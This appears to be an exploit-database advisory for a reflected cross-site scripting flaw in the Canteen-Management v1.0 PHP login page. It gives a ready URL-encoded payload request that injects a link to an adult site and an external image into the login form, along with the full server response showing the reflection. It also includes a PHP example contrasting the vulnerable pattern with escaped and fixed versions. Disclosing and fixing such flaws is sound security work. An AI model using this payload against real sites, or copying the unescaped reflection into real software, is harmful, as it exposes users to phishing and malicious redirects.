## https://sploitus.com/exploit?id=EDB-ID:51062
## Exploit Title: Canteen-Management v1.0 - XSS-Reflected
## Exploit Author: nu11secur1ty
## Date: 10.04.2022
## Vendor: Free PHP Projects & Ideas with Source Codes for Students | mayurik <https://www.mayurik.com/>
## Software:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/Docs
## Reference:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management

## Description:
The name of an arbitrarily supplied URL parameter is copied into the value
of an HTML tag attribute that is enclosed in double quotation marks.
An attacker can craft a malicious HTTPS URL that redirects to another
malicious URL. When the victim clicks the crafted URL, the game is
over for them.

[+]Payload REQUEST:

```http
GET /youthappam/login.php/lu555%22%3E%3Ca%20href=%22https://pornhub.com/%22%20target=%22_blank%22%20rel=%22noopener%20nofollow%20ugc%22%3E%20%3Cimg%20src=%22https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif?token=GHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ&rs=1%22%20style=%22border:1px%20solid%20black;max-width:100%;%22%20alt=%22Photo%20of%20Byron%20Bay,%20one%20of%20Australia%27s%20best%20beaches!%22%3E%20%3C/a%3Emv2me HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="106", "Chromium";v="106"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
```

[+]Payload RESPONSE:

```burp
HTTP/1.1 200 OK
Date: Tue, 04 Oct 2022 09:44:55 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
X-Powered-By: PHP/8.1.6
Set-Cookie: PHPSESSID=m1teao9b0j86ep94m6v7ek7fe6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6140
Connection: close
Content-Type: text/html; charset=UTF-8

<link rel="stylesheet" href="assets/css/popup_style.css">
           <style>
.footer1 {
  position: fixed;
  bottom: 0;
  width: 100%;
  color: #5c4ac7;
  text-align: center;
}

</style>
   <!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">

<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0,
user-scalable=0, minimal-ui">
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="description" content="">
<meta name="keywords" content="">
<meta name="author" content="">

    <link rel="icon" type="image/png" sizes="16x16"
href="assets/uploadImage/Logo/favicon.png">





             <style type="text/css">
@media print {
    #printbtn {
        display :  none;
    }
}
</style>
    <title>Youthappam Canteen Management System - by Mayuri K.
Freelancer</title>

  <link href="assets/css/lib/chartist/chartist.min.css" rel="stylesheet">
  <link href="assets/css/lib/owl.carousel.min.css" rel="stylesheet" />
    <link href="assets/css/lib/owl.theme.default.min.css" rel="stylesheet"
/>

    <link href="assets/css/lib/bootstrap/bootstrap.min.css"
rel="stylesheet">

    <link href="assets/css/helper.css" rel="stylesheet">
    <link href="assets/css/style.css" rel="stylesheet">
 <link rel="stylesheet"
href="assets/css/lib/html5-editor/bootstrap-wysihtml5.css" />
 <link href="assets/css/lib/calendar2/semantic.ui.min.css" rel="stylesheet">
    <link href="assets/css/lib/calendar2/pignose.calendar.min.css"
rel="stylesheet">
     <link href="assets/css/lib/sweetalert/sweetalert.css" rel="stylesheet">
     <link href="assets/css/lib/datepicker/bootstrap-datepicker3.min.css"
rel="stylesheet">


    <script type="text/javascript" src="
https://www.gstatic.com/charts/loader.js"></script>
    <script type="text/javascript">
      google.charts.load("current", {packages:["corechart"]});
      google.charts.setOnLoadCallback(drawChart);
      function drawChart() {
        var data = google.visualization.arrayToDataTable([
          ['Food', 'Average sale per Day'],
          ['Masala dosa',     11],
          ['Chicken 65 ',      2],
          ['Karapu Boondi',  2],
          ['Bellam Gavvalu', 2],
          ['Gummadikaya Vadiyalu',    7]
        ]);

        var options = {
          title: 'Food Average Sale per Day',
          pieHole: 0.4,
        };

        var chart = new
google.visualization.PieChart(document.getElementById('donutchart'));
        chart.draw(data, options);
      }
    </script>
</head>

<body class="fix-header fix-sidebar">

<div id="page"></div>
<div id="loading"></div>





    <div id="main-wrapper">
        <div class="unix-login">

            <div class="container-fluid" style="background-image:
url('assets/myimages/background.jpg');
 background-color: #ffffff;background-size:cover">
                <div class="row">
                    <div class="col-lg-4 ml-auto">
                        <div class="login-content">
                            <div class="login-form">
                                <center><img
src="./assets/uploadImage/Logo/logo.png" style="width: 100%;"></center><br>
                                <form action="/youthappam/login.php/lu555"><a href="https:/pornhub.com/" target="_blank" rel="noopener nofollow ugc"> <img src="https:/raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif" method="post" id="loginForm">
                                    <div class="form-group">

                                        <input type="text" name="username"
id="username" class="form-control" placeholder="Username" required="">

                                    </div>
                                    <div class="form-group">

                                        <input type="password"
id="password" name="password" class="form-control" placeholder="Password"
required="">
                                    </div>


                                    <button type="submit" name="login"
class="f-w-600 btn btn-primary btn-flat m-b-30 m-t-30">Sign in</button>

                                <!-- <div class="forgot-phone text-right
f-right">
<a href="#" class="text-right f-w-600"> Forgot Password?</a>
</div> -->

<div class="forgot-phone text-left f-left">
<a href = "mailto:mayuri.infospace@gmail.com?subject = Project Development
Requirement&body = I saw your projects. I want to develop a project"
class="text-right f-w-600"> Click here to contact me</a>
</div>
                                </form>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>




    <script src="./assets/js/lib/jquery/jquery.min.js"></script>

    <script src="./assets/js/lib/bootstrap/js/popper.min.js"></script>
    <script src="./assets/js/lib/bootstrap/js/bootstrap.min.js"></script>

    <script src="./assets/js/jquery.slimscroll.js"></script>

    <script src="./assets/js/sidebarmenu.js"></script>

    <script
src="./assets/js/lib/sticky-kit-master/dist/sticky-kit.min.js"></script>

    <script src="./assets/js/custom.min.js"></script>
    <script>

function onReady(callback) {
    var intervalID = window.setInterval(checkReady, 1000);
    function checkReady() {
        if (document.getElementsByTagName('body')[0] !== undefined) {
            window.clearInterval(intervalID);
            callback.call(this);
        }
    }
}

function show(id, value) {
    document.getElementById(id).style.display = value ? 'block' : 'none';
}

onReady(function () {
    show('page', true);
    show('loading', false);
});
    </script>
</body>

</html>
```
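
The response above shows the request path reflected unencoded into the `action` attribute of the login form, which is where the double quote closes the attribute. The following is an added example, not the application's code: it assumes `login.php` builds the action from `$_SERVER['PHP_SELF']` (the source is not shown on this page), and the function names and the sample path are constructed for illustration.

```php
<?php
declare(strict_types=1);

// Path of the login script as it appears in the request on this page.
const LOGIN_ACTION = '/youthappam/login.php';

// Vulnerable pattern (assumed): the request path, including any extra path
// segment after the script name, is written into a double-quoted attribute as-is.
function form_open_vulnerable(string $self): string
{
    return '<form action="' . $self . '" method="post" id="loginForm">';
}

// Hardened: encode for an HTML attribute context, so a double quote in the
// path becomes &quot; and can no longer terminate the attribute.
function form_open_escaped(string $self): string
{
    $safe = htmlspecialchars($self, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<form action="' . $safe . '" method="post" id="loginForm">';
}

// Preferred: do not reflect the request path at all; post to a fixed action.
function form_open_fixed(): string
{
    return '<form action="' . LOGIN_ACTION . '" method="post" id="loginForm">';
}

// Constructed sample: a decoded request path with a harmless anchor tag
// appended after the script name, as PHP would see it.
$self = LOGIN_ACTION . '/x"><a href="https://example.test/">link</a>';

$variants = [
    'vulnerable' => form_open_vulnerable($self),
    'escaped'    => form_open_escaped($self),
    'fixed'      => form_open_fixed(),
];

foreach ($variants as $label => $html) {
    // A raw "<a " in the output means the markup escaped the attribute.
    $injected = str_contains($html, '<a ') ? 'yes' : 'no';
    printf("%-10s injected_tag=%s\n  %s\n", $label, $injected, $html);
}
```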

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/mayuri_k/2022/Canteen-Management)

## Proof and Exploit:
[href](https://streamable.com/emg0zo)

-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
                          nu11secur1ty <http://nu11secur1ty.com/>